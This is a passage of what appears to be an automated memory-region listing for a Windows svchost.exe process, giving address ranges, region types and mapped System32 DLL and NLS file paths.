entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 2472 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 2473 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 2474 start_va = 0x5400000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 2475 start_va = 0x5500000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 2476 start_va = 0x5620000 end_va = 0x5630fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 2477 start_va = 0x5640000 end_va = 0x5650fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 2478 start_va = 0x5660000 end_va = 0x5670fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 2479 start_va = 0x5680000 end_va = 0x5690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 2480 start_va = 0x56a0000 end_va = 0x56b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 2481 start_va = 0x56c0000 end_va = 0x56d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 2482 start_va = 0x56f0000 end_va = 0x56f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056f0000" filename = "" Region: id = 2483 start_va = 0x5700000 end_va = 0x577ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 2484 start_va = 0x57d0000 end_va = 0x57d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000057d0000" filename = "" Region: id = 2485 start_va = 0x5800000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 2486 start_va = 0x5900000 end_va = 0x59fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005900000" filename = "" Region: id = 2487 start_va = 0x5a00000 end_va = 0x5a10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 2488 start_va = 0x5a20000 end_va = 0x5a30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 2489 start_va = 0x5a40000 end_va = 0x5abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a40000" filename = "" Region: id = 2490 start_va = 0x5ad0000 end_va = 0x5b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 2491 start_va = 0x5b50000 end_va = 0x5bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b50000" filename = "" Region: id = 2492 start_va = 0x5bd0000 end_va = 0x5bd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005bd0000" filename = "" Region: id = 2493 start_va = 0x5be0000 end_va = 0x5bf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 2494 start_va = 0x5c10000 end_va = 0x5c37fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 2495 start_va = 0x5c40000 end_va = 0x5c70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 2496 start_va = 0x5c80000 end_va = 0x5cb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 2497 start_va = 0x5cc0000 end_va = 0x5cf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 2498 start_va = 0x5d10000 end_va = 0x5e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d10000" filename = "" Region: id = 2499 start_va = 0x5e10000 end_va = 0x5f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e10000" filename = "" Region: id = 2500 start_va = 0x5f10000 end_va = 0x5f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f10000" filename = "" Region: id = 2501 start_va = 0x5f90000 end_va = 0x608ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f90000" filename = "" Region: id = 2502 start_va = 0x6090000 end_va = 0x6096fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006090000" filename = "" Region: id = 2503 start_va = 0x6110000 end_va = 0x620ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006110000" filename = "" Region: id = 2504 start_va = 0x6210000 end_va = 0x630ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006210000" filename = "" Region: id = 2505 start_va = 0x6310000 end_va = 0x640ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006310000" filename = "" Region: id = 2506 start_va = 0x6410000 end_va = 0x650ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006410000" filename = "" Region: id = 2507 start_va = 0x6510000 end_va = 0x660ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006510000" filename = "" Region: id = 2508 start_va = 0x6610000 end_va = 0x670ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006610000" filename = "" Region: id = 2509 start_va = 0x6710000 end_va = 0x680ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006710000" filename = "" Region: id = 2510 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 2511 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 2512 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 2513 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 2514 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 2515 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 2516 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 2517 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 2518 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 2519 start_va = 0x7200000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 2520 start_va = 0x7300000 end_va = 0x73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 2521 start_va = 0x7400000 end_va = 0x74fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007400000" filename = "" Region: id = 2522 start_va = 0x7500000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 2523 start_va = 0x7720000 end_va = 0x781ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007720000" filename = "" Region: id = 2524 start_va = 0x7900000 end_va = 0x79fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007900000" filename = "" Region: id = 2525 start_va = 0x7a00000 end_va = 0x7afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a00000" filename = "" Region: id = 2526 start_va = 0x7b00000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b00000" filename = "" Region: id = 2527 start_va = 0x7d20000 end_va = 0x7e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d20000" filename = "" Region: id = 2528 start_va = 0x8020000 end_va = 0x811ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008020000" filename = "" Region: id = 2529 start_va = 0x8320000 end_va = 0x841ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008320000" filename = "" Region: id = 2530 start_va = 0x8420000 end_va = 0x851ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008420000" filename = "" Region: id = 2531 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2532 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2533 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2534 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2535 start_va = 0x7ff73cbd0000 end_va = 0x7ff73cbdcfff monitored = 0 entry_point = 0x7ff73cbd3980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2536 start_va = 0x7ffd8b780000 end_va = 0x7ffd8ba2ffff monitored = 0 entry_point = 0x7ffd8b781cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 2537 start_va = 0x7ffd8eac0000 end_va = 0x7ffd8eb03fff monitored = 0 entry_point = 0x7ffd8eae83e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 2538 start_va = 0x7ffd8fd30000 end_va = 0x7ffd8fd8cfff monitored = 0 entry_point = 0x7ffd8fd5e510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 2539 start_va = 0x7ffd96d00000 end_va = 0x7ffd96d13fff monitored = 0 entry_point = 0x7ffd96d03710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 2540 start_va = 0x7ffd96d20000 end_va = 0x7ffd96d47fff monitored = 0 entry_point = 0x7ffd96d2efc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 2541 start_va = 0x7ffd96db0000 end_va = 0x7ffd96dcdfff monitored = 0 entry_point = 0x7ffd96dbef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 2542 start_va = 0x7ffd96dd0000 end_va = 0x7ffd96e4ffff monitored = 0 entry_point = 0x7ffd96dfd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2543 start_va = 0x7ffd96e50000 end_va = 0x7ffd96e85fff monitored = 0 entry_point = 0x7ffd96e527f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 2544 start_va = 0x7ffd96ef0000 end_va = 0x7ffd96f05fff monitored = 0 entry_point = 0x7ffd96ef1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 2545 start_va = 0x7ffd96fc0000 end_va = 0x7ffd96fd0fff monitored = 0 entry_point = 0x7ffd96fc7480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 2546 start_va = 0x7ffd96fe0000 end_va = 0x7ffd97063fff monitored = 0 entry_point = 0x7ffd96ff8d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 2547 start_va = 0x7ffd97150000 end_va = 0x7ffd97165fff monitored = 0 entry_point = 0x7ffd971555e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2548 start_va = 0x7ffd97170000 end_va = 0x7ffd97245fff monitored = 0 entry_point = 0x7ffd9719a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 2549 start_va = 0x7ffd97250000 end_va = 0x7ffd972b3fff monitored = 0 entry_point = 0x7ffd9726bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 2550 start_va = 0x7ffd972c0000 end_va = 0x7ffd972e4fff monitored = 0 entry_point = 0x7ffd972c9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2551 start_va = 0x7ffd972f0000 end_va = 0x7ffd97303fff monitored = 0 entry_point = 0x7ffd972f1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2552 start_va = 0x7ffd97310000 end_va = 0x7ffd97325fff monitored = 0 entry_point = 0x7ffd97311af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 2553 start_va = 0x7ffd97330000 end_va = 0x7ffd97349fff monitored = 0 entry_point = 0x7ffd97332330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 2554 start_va = 0x7ffd97350000 end_va = 0x7ffd97445fff monitored = 0 entry_point = 0x7ffd97389590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2555 start_va = 0x7ffd97450000 end_va = 0x7ffd974c3fff monitored = 0 entry_point = 0x7ffd97465eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2556 start_va = 0x7ffd974d0000 end_va = 0x7ffd97606fff monitored = 0 entry_point = 0x7ffd97510480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 2557 start_va = 0x7ffd97630000 end_va = 0x7ffd97640fff monitored = 0 entry_point = 0x7ffd97632fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2558 start_va = 0x7ffd97650000 end_va = 0x7ffd9766dfff monitored = 0 entry_point = 0x7ffd97653a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2559 start_va = 0x7ffd97670000 end_va = 0x7ffd976f1fff monitored = 0 entry_point = 0x7ffd97672a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2560 start_va = 0x7ffd98150000 end_va = 0x7ffd9815efff monitored = 0 entry_point = 0x7ffd98154960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 2561 start_va = 0x7ffd98160000 end_va = 0x7ffd981a5fff monitored = 0 entry_point = 0x7ffd981679a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 2562 start_va = 0x7ffd981b0000 end_va = 0x7ffd981effff monitored = 0 entry_point = 0x7ffd981bcbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 2563 start_va = 0x7ffd981f0000 end_va = 0x7ffd98236fff monitored = 0 entry_point = 0x7ffd981f1d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 2564 start_va = 0x7ffd98290000 end_va = 0x7ffd9829cfff monitored = 0 entry_point = 0x7ffd98291420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 2565 start_va = 0x7ffd984f0000 end_va = 0x7ffd98531fff monitored = 0 entry_point = 0x7ffd984f3670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 2566 start_va = 0x7ffd985b0000 end_va = 0x7ffd985cefff monitored = 0 entry_point = 0x7ffd985b37e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 2567 start_va = 0x7ffd985d0000 end_va = 0x7ffd98648fff monitored = 0 entry_point = 0x7ffd985d76a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 2568 start_va = 0x7ffd98830000 end_va = 0x7ffd98847fff monitored = 0 entry_point = 0x7ffd98832000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2569 start_va = 0x7ffd98850000 end_va = 0x7ffd989d1fff monitored = 0 entry_point = 0x7ffd988682a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2570 start_va = 0x7ffd989e0000 end_va = 0x7ffd989f7fff monitored = 0 entry_point = 0x7ffd989e4e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 2571 start_va = 0x7ffd98a00000 end_va = 0x7ffd98a24fff monitored = 0 entry_point = 0x7ffd98a05ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 2572 start_va = 0x7ffd98b40000 end_va = 0x7ffd98be2fff monitored = 0 entry_point = 0x7ffd98b42c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 2573 start_va = 0x7ffd98bf0000 end_va = 0x7ffd98c41fff monitored = 0 entry_point = 0x7ffd98bf5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 2574 start_va = 0x7ffd98c50000 end_va = 0x7ffd98c7dfff monitored = 1 entry_point = 0x7ffd98c52300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 2575 start_va = 0x7ffd98c80000 end_va = 0x7ffd98cddfff monitored = 0 entry_point = 0x7ffd98c85080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 2576 start_va = 0x7ffd98ce0000 end_va = 0x7ffd98cfffff monitored = 0 entry_point = 0x7ffd98ce1f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 2577 start_va = 0x7ffd98d00000 end_va = 0x7ffd98d08fff monitored = 0 entry_point = 0x7ffd98d018f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 2578 start_va = 0x7ffd98d10000 end_va = 0x7ffd98d20fff monitored = 0 entry_point = 0x7ffd98d11d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 2579 start_va = 0x7ffd98d30000 end_va = 0x7ffd98d70fff monitored = 0 entry_point = 0x7ffd98d33750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 2580 start_va = 0x7ffd98d80000 end_va = 0x7ffd98e72fff monitored = 0 entry_point = 0x7ffd98da5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2581 start_va = 0x7ffd9b190000 end_va = 0x7ffd9b1dbfff monitored = 0 entry_point = 0x7ffd9b1a5310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 2582 start_va = 0x7ffd9b2a0000 end_va = 0x7ffd9b2a9fff monitored = 0 entry_point = 0x7ffd9b2a1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2583 start_va = 0x7ffd9b340000 end_va = 0x7ffd9b3befff monitored = 0 entry_point = 0x7ffd9b357110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2584 start_va = 0x7ffd9b3c0000 end_va = 0x7ffd9b3fbfff monitored = 0 entry_point = 0x7ffd9b3c6aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 2585 start_va = 0x7ffd9b400000 end_va = 0x7ffd9b40bfff monitored = 0 entry_point = 0x7ffd9b4035c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2586 start_va = 0x7ffd9ca20000 end_va = 0x7ffd9ca28fff monitored = 0 entry_point = 0x7ffd9ca221d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 2587 start_va = 0x7ffd9ca30000 end_va = 0x7ffd9ca64fff monitored = 0 entry_point = 0x7ffd9ca3a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 2588 start_va = 0x7ffd9cb70000 end_va = 0x7ffd9cde9fff monitored = 0 entry_point = 0x7ffd9cb8a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 2589 start_va = 0x7ffd9cf80000 end_va = 0x7ffd9cfbefff monitored = 0 entry_point = 0x7ffd9cfa82d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 2590 start_va = 0x7ffd9d000000 end_va = 0x7ffd9d00ffff monitored = 0 entry_point = 0x7ffd9d001690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 2591 start_va = 0x7ffd9da20000 end_va = 0x7ffd9da41fff monitored = 0 entry_point = 0x7ffd9da32540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 2592 start_va = 0x7ffd9da50000 end_va = 0x7ffd9db24fff monitored = 0 entry_point = 0x7ffd9da6cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 2593 start_va = 0x7ffd9e610000 end_va = 0x7ffd9e61ffff monitored = 0 entry_point = 0x7ffd9e611700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 2594 start_va = 0x7ffd9e620000 end_va = 0x7ffd9e628fff monitored = 0 entry_point = 0x7ffd9e621ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 2595 start_va = 0x7ffd9e630000 end_va = 0x7ffd9e65cfff monitored = 0 entry_point = 0x7ffd9e632290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 2596 start_va = 0x7ffd9e660000 end_va = 0x7ffd9e6b1fff monitored = 0 entry_point = 0x7ffd9e6638e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 2597 start_va = 0x7ffd9ece0000 end_va = 0x7ffd9ece9fff monitored = 0 entry_point = 0x7ffd9ece14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2598 start_va = 0x7ffd9f020000 end_va = 0x7ffd9f031fff monitored = 0 entry_point = 0x7ffd9f023580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2599 start_va = 0x7ffd9f0b0000 end_va = 0x7ffd9f0cafff monitored = 0 entry_point = 0x7ffd9f0b1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2600 start_va = 0x7ffd9f190000 end_va = 0x7ffd9f1a1fff monitored = 0 entry_point = 0x7ffd9f191a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 2601 start_va = 0x7ffd9f1b0000 end_va = 0x7ffd9f1c4fff monitored = 0 entry_point = 0x7ffd9f1b2dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2602 start_va = 0x7ffd9f1d0000 end_va = 0x7ffd9f1e2fff monitored = 0 entry_point = 0x7ffd9f1d1b10 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 2603 start_va = 0x7ffd9f1f0000 end_va = 0x7ffd9f28ffff monitored = 0 entry_point = 0x7ffd9f260910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 2604 start_va = 0x7ffd9f290000 end_va = 0x7ffd9f2b5fff monitored = 0 